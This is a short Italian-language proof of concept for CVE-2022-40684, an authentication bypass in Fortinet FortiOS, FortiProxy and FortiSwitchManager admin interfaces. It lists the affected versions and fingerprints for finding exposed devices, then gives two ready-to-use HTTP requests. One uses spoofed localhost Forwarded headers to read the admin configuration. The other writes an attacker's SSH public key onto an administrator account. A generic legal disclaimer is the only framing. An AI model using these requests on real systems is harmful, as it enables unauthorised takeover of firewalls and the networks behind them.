
PoC e exploit per CVE-2022-40684, un bypass di autenticazione nelle interfacce di gestione di Fortinet FortiOS, FortiProxy e FortiSwitchManager, che consente l'accesso amministrativo non autorizzato tramite richieste HTTP appositamente create.
Ogni individuo e organizzazione che utilizza la rete deve rispettare le leggi costituzionali, l'ordine pubblico e la morale sociale, non deve compromettere la sicurezza della rete, né utilizzare la rete per danneggiare la sicurezza nazionale, l'onore e gli interessi.
Fortinet è un fornitore globalmente riconosciuto di prodotti per la sicurezza informatica e soluzioni di sicurezza. I suoi prodotti includono firewall, software antivirus, sistemi di prevenzione delle intrusioni e componenti di sicurezza per endpoint. Nell'interfaccia di amministrazione dei prodotti interessati FortiOS, FortiProxy e FortiSwitchManager, è possibile aggirare l'autenticazione utilizzando un percorso o canale alternativo e operare sull'interfaccia di amministrazione tramite richieste HTTP o HTTPS appositamente predisposte, senza autenticazione.
Alto
FortiOS versione 7.2.0 - 7.2.1
FortiOS versione 7.0.0 - 7.0.6
FortiProxy versione 7.2.0
FortiProxy versione 7.0.0 - 7.0.6
FortiSwitchManager versione 7.2.0
FortiSwitchManager versione 7.0.0
title="FortiProxy“
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

